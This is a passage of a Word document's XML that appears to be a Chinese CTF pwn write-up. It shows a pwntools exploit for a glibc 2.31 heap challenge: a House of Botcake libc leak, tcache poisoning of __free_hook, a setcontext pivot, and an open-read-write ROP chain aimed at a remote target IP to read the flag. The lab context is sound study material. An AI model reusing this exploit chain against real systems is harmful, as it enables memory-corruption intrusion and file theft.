          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">核心逻辑，把</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据完美输出至屏幕的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stdout。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="10" w:name="header-n9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exp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context(arch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'amd64'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, 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libc-2.31 关键偏移</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">STDOUT_OFF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0x1ed6a0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FREE_HOOK_OFF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0x1eee48</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># mov rdx,[rdi+8]; call [rdx+0x20]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">MAGIC_OFF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0x151bb0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># setcontext+61: 从 rdx 加载寄存器上下文</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SETCTX61_OFF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0x54f5d</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">POP_RDI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0x23b6a</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">POP_RSI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0x2601f</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">POP_RDX_RBX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0x15fae6</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">POP_RAX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0x36174</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSCALL_RET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0x630a9</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RET_SLED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0x22679</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_HOST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'39.96.193.120'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_PORT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xor_key(addr):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pwn1(tube, nib):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"""House of Botcake 泄露 libc"""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note_add(idx, sz,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b'A'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b'Choice'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b'Index'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b'Size'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(sz).encode())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        tube.sendafter(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'Content'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, data.ljust(sz,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)[:sz])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note_del(idx):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b'Choice'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b'Index'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note_edit(idx, data):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b'Choice'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tube.sendlineafter(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'Index'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    tube.sendafter(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'Content'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, 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耗尽 seccomp 残留 tcache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0x68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0xb8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0xd8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note_add(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sz)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布局: A(0x88,idx0) | B(0x98,idx1) | guard(0x20,idx3) | X(0x98,idx2)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填满 tcache[0xa0] 和 tcache[0x90]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note_add(i,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note_del(i)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note_add(i,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note_del(i)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A+B 合并进 unsorted bin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    note_del(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note_del(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drain tcache[0xa0]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note_add(i,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 和 B 进 tcache[0xa0]，head=B</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    note_del(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note_del(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drain tcache[0x90]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note_add(i,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AB，remainder 落在 B 位置，glibc 写 B.fd = main_arena+96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partial overwrite B.fd 低 2 字节指向 stdout</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    note_edit(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p16((nib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0x6a0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 B</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    note_add(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 stdout，写 FILE 结构体触发 leak</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    tube.sendlineafter(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'Choice'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tube.sendlineafter(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'Index'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tube.sendlineafter(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'Size'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b'152'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tube.sendafter(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'Content'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, p64(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xfbad1800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tube.clean(timeout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note_add, note_del, note_edit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从泄露数据中搜索 libc 指针</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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u64(leaked[i:i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0x1ec980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0x1ecbe0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0x1ed6a0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0x1ed5c0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0x1ed4a0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libc_base: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libc_base, note_add, note_del, note_edit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pwn2(tube, libc_base, note_add, note_del, note_edit):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"""3 次 tcache poisoning 写 ORW payload 到 __free_hook 区域"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    free_hook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FREE_HOOK_OFF</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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MAGIC_OFF</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    setctx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SETCTX61_OFF</w:t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RET_SLED</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    rop_start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0xb8</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    flag_str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0x190</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    read_buf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ORW ROP: open("./flag",0) -&gt; read(3,buf,0x100) -&gt; write(1,buf,0x100)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p64(flag_str)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POP_RSI)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POP_RAX)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SYSCALL_RET)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POP_RSI)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p64(read_buf)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POP_RDX_RBX)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POP_RAX)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SYSCALL_RET)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POP_RSI)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p64(read_buf)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POP_RDX_RBX)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BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x100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POP_RAX)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SYSCALL_RET)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(tube.sendline(d), time.sleep(D))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    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(tube.send(d), time.sleep(D))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第一次 poisoning: free_hook+0x110 写 ROP 后半段 + flag 路径 ---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sd(p64(free_hook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(chain[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:])]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block1[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x80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0x87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b'./flag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(block1))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第二次 poisoning: free_hook+0x88 写 frame 尾部 + ROP 前半段 ---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b'7'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sd(p64(free_hook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block2[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p64(rop_start)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># [rdx+0xa0] = rsp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    block2[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0x30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p64(ret)        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># [rdx+0xa8] = RIP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    block2[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x30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chain[: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(block2))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准备 trigger chunk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p64(free_hook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 第三次 poisoning: free_hook+0x00 写 magic_gadget + setcontext ---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b'9'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sd(p64(free_hook)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0x88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block3[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00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0x08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p64(magic)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    block3[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x30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p64(setctx)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b'136'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sd(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(block3))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触发: free(trigger) -&gt; magic -&gt; setcontext -&gt; ROP -&gt; ORW</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    sl(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'2'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sl(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'10'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pwn3(tube):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"""接收 flag 输出"""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tube.recvall(timeout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log.success(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"FLAG: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log.info(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"nibble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nib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tube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remote(TARGET_HOST, TARGET_PORT)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            libc_base, note_add, note_del, note_edit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pwn1(tube, nib)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libc_base:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                tube.close()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log.success(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"libc base: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(libc_base)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pwn2(tube, libc_base, note_add, note_del, note_edit)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pwn3(tube):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tube.close()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log.warning(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nib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2026-05-18T04:03:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-18T04:03:36Z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